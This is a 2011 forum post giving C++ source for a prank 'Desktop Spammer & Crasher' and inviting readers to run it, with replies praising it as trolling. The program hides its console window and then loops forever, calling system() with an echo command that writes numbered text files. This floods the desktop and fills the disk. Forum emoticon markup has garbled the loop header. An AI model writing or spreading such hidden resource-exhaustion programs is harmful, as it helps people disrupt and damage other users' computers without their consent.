Post: [C++ Source & EXE] Desktop Spammer & Crasher
05-26-2011, 10:06 PM #1
(adsbygoogle = window.adsbygoogle || []).push({}); I was bored so I made this, You will all be curious to run it. Just dont cry or complain after your desktop has had triplets.

You must login or register to view this content. - Someone can do a Virus scan for me.

    #define _WIN32_WINNT 0x0500  
#include<iostream>
#include<windows.h>
#include<string.h>
#include <sstream>

using namespace std;

string str_i(int input)
{
stringstream out;
out << input;
return out.str();
}

int main(int argc, char *argv[])
{
HWND hWnd = GetConsoleWindow();
ShowWindow(hWnd, SW_HIDE);

string add_line[3]={"echo Relevant x>Rel_","",".txt"};
string output_line="";

int file_count=0;
for(;Winky Winky
{
add_line[1]=str_i(file_count);

output_line=add_line[0];
output_line+=add_line[1];
output_line+=add_line[2];

system(output_line.c_str());
file_count++;
}
}

The following 2 users say thank you to Relevant for this useful post:

Curt, RastaMajik
05-29-2011, 04:50 PM #11
Merkii
Former Staff
Originally posted by Relevant View Post
:fyea: Maximum trolling =D

+9001 You must login or register to view this content.


My sig is true I :love: chris

Copyright © 2025, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo